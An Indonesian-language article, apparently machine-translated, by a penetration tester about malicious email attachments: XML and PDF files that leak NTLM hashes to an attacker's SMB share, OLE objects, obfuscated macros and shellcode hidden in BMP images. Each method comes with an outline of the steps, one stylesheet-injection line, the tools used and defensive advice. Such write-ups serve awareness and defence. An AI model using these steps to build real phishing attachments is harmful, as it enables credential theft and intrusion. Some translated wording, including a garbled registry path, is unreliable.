Terbuka tidak dapat diabaikan

Pekerjaan saya terkait dengan fakta bahwa saya berbohong kepada orang-orang dan mengeksploitasi sifat mudah tertipu, keingintahuan, keserakahan, dan sebagainya. Saya menyukai pekerjaan saya dan mencoba mendekatinya secara kreatif. Kekhasan aktivitas saya terkait dengan melakukan serangan dengan metode rekayasa sosial. Dan dalam posting ini saya ingin berbicara tentang lampiran jahat.

Jika PDF masuk ke email Anda, apakah Anda akan membukanya? Dan file Word? Apakah Anda akan membuka gambar dari sumber yang tidak dikenal? Apakah mungkin mengalami masalah jika Anda mengunduh arsip? Seberapa baik Anda tahu investasi mana yang berbahaya dan mana yang tidak? Bagaimana dengan kolega Anda?

Untuk beberapa lusin proyek, saya telah mencoba cara yang sangat berbeda untuk mengirimkan muatan kepada pengguna. Beberapa sangat efektif, beberapa mudah dideteksi - masing-masing memiliki kekurangan dan kelebihan masing-masing. Saya tidak akan mulai memberi tahu cara mengemas file yang dapat dieksekusi dengan ekstensi .exe di arsip. Dengan pendekatan kuno seperti itu, menerobos sistem keamanan, dan kemudian juga membuat pengguna memulai lampiran, lebih mahal. Saya akan memberi tahu Anda file apa yang berpotensi berbahaya yang sebenarnya dapat diterima melalui pos (atau dikirim) hari ini.

Penafian: Semua hal berikut ini hanya untuk tujuan informasi. Penulis menggambarkan pengalaman yang diperoleh selama pentest, tidak bertanggung jawab atas pengulangan serangan-serangan ini dan mendorong untuk tidak menggunakan materi untuk tujuan ilegal.

XML

Esensi dari metode ini

Sebagian besar file Office didasarkan pada Microsoft Office Open XML (OOXML), yang pada dasarnya adalah format XML terkompresi yang dikembangkan oleh Microsoft untuk menyajikan tabel, grafik, presentasi, dan sebagainya. Keterlibatan XML ditampilkan dalam ekstensi dokumen (docx, xlsx, pptx). Sangat aneh bahwa dokumen Office semacam itu dapat dibuka sebagai file teks biasa dengan semua tag dan atribut. File Office Open XML apa pun dapat disimpan sebagai XML dan membuat perubahan pada tag. Misalnya, tambahkan tautan ke folder publik yang dikendalikan oleh penyerang. Ketika Anda menjalankan file XML, itu mencoba untuk terhubung ke folder publik yang terbuka. Ketika mencoba terhubung melalui protokol smb, Windows dengan ramah menyediakan hash NTLM (NTLMv2) dan login pengguna ke penyerang.



Singkatnya implementasi

Untuk mengimplementasikan vektor, Anda perlu membuat dokumen Office Open XML (docx, pptx, xlsx, dll.), Simpan sebagai XML. Buka XML dan buat perubahan berikut:

<?xml-stylesheet type="text/xsl" href="\\xxx.xxx.xxx.xxx \test\swordfish.xsl ">

Dalam tag yang ditentukan, Anda harus menentukan alamat folder jaringan publik tempat korban akan terhubung.

Catatan : alih-alih ="\\xxx.xxx.xxx.xxx\test\swordfish.xsl Anda dapat menulis file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl . Selanjutnya, file tersebut harus disimpan dan dikirim ke korban.

Informasi tentang serangan itu dapat ditemukan di sini .

Catatan : tergantung pada sistem operasi dan pengaturan, pengguna mungkin harus menyetujui persyaratan atau komentar tambahan, misalnya:



Artikel tidak akan lengkap tanpa saran perlindungan:

• Gunakan kebijakan kata sandi yang kompleks.
• Gunakan NTLMv2.
• Tolak lalu lintas eksternal melalui seseorang (tcp 139/445).

Bad-pdf

Esensi dari metode ini

Tag ditambahkan ke file PDF dengan tautan ke server seseorang yang dikendalikan oleh penyerang. Seperti pada contoh di atas, ketika membuka file, sistem operasi mentransmisikan hash NTLM (NTLMv2) untuk terhubung ke folder publik.

Singkatnya implementasi

Menerapkan serangan ini jauh lebih mudah daripada yang sebelumnya. Untuk berhasil mencuri hash, cukup unduh utilitasnya (git clone di sini atau di sini ) dan berikan hak untuk mengeksekusi (chmod + x) file python. Selanjutnya, jalankan skrip python dan masukkan alamat IP, nama file, dan antarmuka, seperti pada gambar di bawah ini.


Menghasilkan file payload.

File yang diterima dapat dikirim ke surat dengan kedok ucapan selamat, dokumen untuk tanda tangan, pemindaian aplikasi dan sebagainya. Ketika file dimulai, semua hash akan dikirim ke penyerang.



Perlindungan

• Gunakan kebijakan kata sandi yang kompleks.
• Gunakan NTLMv2.
• Tolak lalu lintas eksternal melalui seseorang (tcp 139/445).

Objek OLE

Esensi dari metode ini

Dalam dokumen Office yang sah, skrip yang diluncurkan dengan mengklik tertanam. Script dapat berupa apa saja, biasanya hanya muatan. Ini memiliki ikon sendiri, yang dapat diubah, tergantung pada keinginan penyerang, hingga salinan lengkap dari gaya dokumen Office yang mensimulasikan pesan kesalahan. Tidak seperti makro, file dengan lampiran OLE tidak mencurigakan bagi pengguna biasa.


Singkatnya implementasi

Untuk mempersiapkan serangan ini harus menghabiskan sedikit lebih banyak usaha (dibandingkan dengan yang di atas). Langkah pertama adalah menghasilkan payload. Selanjutnya, Anda perlu memulai server, yang akan menerima koneksi dari payload, kemudian membuat dokumen-Word, mengubahnya menjadi RTF dan menambahkan tautan ke payload. Jika singkat.
Informasi tentang serangan itu dapat ditemukan di sini .

Perlindungan

Untuk melindungi dari serangan tersebut, kami menyarankan Anda membuat perubahan registri berikut:

HKCUSoftwareMicrosoftOffice -> Office Version -> Office application -> SecurityPackagerPrompt

Nilai Office Version mungkin 16.0 (Office 2016); 15.0 (Office 2013); 14.0 (Office 2010); atau 12.0 (Office 2007). Nilai Office application adalah nama aplikasi Office tertentu, yaitu, Word, Excel, dan sebagainya.

Nilai kunci registri ini harus "2", yang berarti "Tidak meminta, Objek tidak mengeksekusi" atau larangan aktual pada eksekusi objek. Nilai "1" memungkinkan pengguna untuk "Meminta dari Office saat pengguna mengklik, objek mengeksekusi", yaitu, objek diklik klik, dan Office menampilkan pesan yang sesuai. Nilai "0", pada gilirannya, berarti "Tidak ada konfirmasi dari Office saat pengguna mengklik, objek dieksekusi", dengan kata lain, objek dieksekusi, tetapi pengguna tidak menerima pesan apa pun dari Office.

Perubahan dapat dilakukan jika fungsi-fungsi ini tidak digunakan dalam proses bisnis perusahaan Anda.

Makro

Karena OLE disebutkan, bagaimana saya tidak bisa menyebutkan makro?



Esensi dari metode ini

Makro - seperangkat perintah yang dirancang untuk menyederhanakan pekerjaan pengguna. Secara potensial, Anda dapat menulis set perintah apa pun secara makro dan karenanya mendapatkan payload. Untuk membuat dokumen dengan makro, penyerang hanya perlu mengaburkan kode payload dan menambahkan kode ke makro dokumen.

Singkatnya implementasi

Ada banyak cara hebat untuk menghasilkan makro saat ini. Anda dapat menggunakan alat Luckystrike atau berhenti di Metasploit yang lebih akrab. Anda dapat menggunakan msfvenom dan mengaburkan makro setelah generasi. Saat makro dibuat, yang perlu Anda lakukan adalah menambahkannya ke dokumen Office. Tetapi tidak seperti lampiran OLE, Anda benar-benar membutuhkan banyak upaya untuk menjalankan makro. Saat ini, sangat sedikit pengguna yang menjalankan makro. Windows telah belajar memperingatkan tentang makro yang mencurigakan, dan ada banyak pembicaraan tentang bahaya mereka.

Perlindungan

Untuk keandalan, saya sarankan menonaktifkan eksekusi makro tanpa pemberitahuan.

BMP

Sangat tidak mungkin Anda akan menemukan lampiran BMP dengan shellcode, jadi berhati-hatilah: ada yang seperti itu.

Esensi dari metode ini

Kode shell tertanam dalam gambar dalam format BMP. Gambar itu sendiri tidak berbahaya pada saat ditemukan. Ini bukan tentang membiarkan penyerang mengambil sesi. Gambar diperlukan untuk berbaring dan menunggu saat penyerang mengaktifkannya menggunakan perintah Powershell. Metode ini tidak begitu banyak serangan sebagai bypass antivirus dan alat deteksi intrusi.

Singkatnya implementasi

Untuk membuat gambar, cukup gunakan repositori ini. DKMC menyediakan segalanya, mulai dari pembuatan gambar hingga kebingungan kode. Saya juga ingin mencatat bahwa gambar "terinfeksi" akan berisi piksel multi-warna yang aneh. Ini dapat dengan mudah diperbaiki jika Anda memotong area gambar yang terlihat sebesar 5-10 piksel.

Setelah membuat gambar, file harus dikirim ke korban dan menunggu saat yang tepat atau mencari kesempatan untuk menjalankan skrip PowerShell.

Perlindungan

Memfilter setiap file bmp karena berpotensi berbahaya tidak efisien. Anda dapat menggunakan konverter dan menyimpan gambar dalam format lain, memeriksa file di komputer, atau menerima kenyataan bahwa jika penyerang berhasil menggunakan skrip PowerShell di komputer karyawan, maka keberadaan gambar dengan kode shell bukanlah masalah keamanan utama.

Faktanya, itu saja. Saya harap artikel ini telah memperluas pemahaman Anda tentang investasi dan bahaya yang mungkin mereka hadapi. Kami akan berbicara tentang tautan yang mencurigakan nanti.



Ekaterina Rudaya ( Caterin ), pakar di Laboratorium untuk Analisis Keamanan Praktis, Jet Infosystems